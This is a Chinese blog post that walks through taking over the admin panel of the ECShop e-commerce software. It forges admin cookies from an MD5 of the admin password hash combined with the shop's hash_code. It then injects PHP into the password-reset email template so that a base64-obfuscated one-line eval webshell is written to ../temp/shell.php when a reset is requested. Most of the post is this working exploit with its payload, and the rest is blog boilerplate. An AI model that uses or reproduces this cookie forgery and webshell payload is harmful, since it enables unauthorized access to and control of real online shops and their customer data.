ecshop后台shell技术分享

    之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。
    用户密码

    admin:d03a7617433c2826976062fec569a434

    ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是

    31693422540744c0a6b6da635b7a5a93

    那就用之前的admin的密码和hash_code的 放在一起再一次MD5

    md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4c01994bce575

    这个时候 用可以修改COOKIE的浏览器。修改cookie为

    ECSCP[admin_id]=1; ECSCP[admin_pass]=76bb7b55d4d0b8283fd4c01994bce575;ECSCP_ID=b5a19c09952c8d1b09a97a89f48df8d1575f1dd1

    后面这个ECSCP_ID随意, 然后访问后台,就可以进去了。反正我是成功了N次,不懂你们。

    {$user_name'];file_put_contents(base64_decode('Li4vdGVtcC9zaGVsbC5waHA='),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4='));echo $var['$user_name}
    <p>{$user_name}您好!<br />
    <br />
    您已经进行了密码重置的操作,请点击以下链接(或者复制到您的浏览器):
    <br />
    <br />
    <atarget ="_blank"href="{$reset_email}">{$reset_email}<br />
    <br />
    以确认您的新密码重置操作!<br />
    <br />
    {$shop_name}<br />
    {$send_date}</atarget></p>

    在后台登陆地方点忘记密码,输入用户和邮箱 提交就会在temp下生成shell.php一句话木马,密码是

    207Li4vdGVtcC9zaGVsbC5waHA= 用base64解密就是 ../temp/shell.php
    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自乐橙呀,原文地址《ecshop后台shell技术分享
    标签:
    喜欢 | 0
    分享:

还没有人抢沙发呢~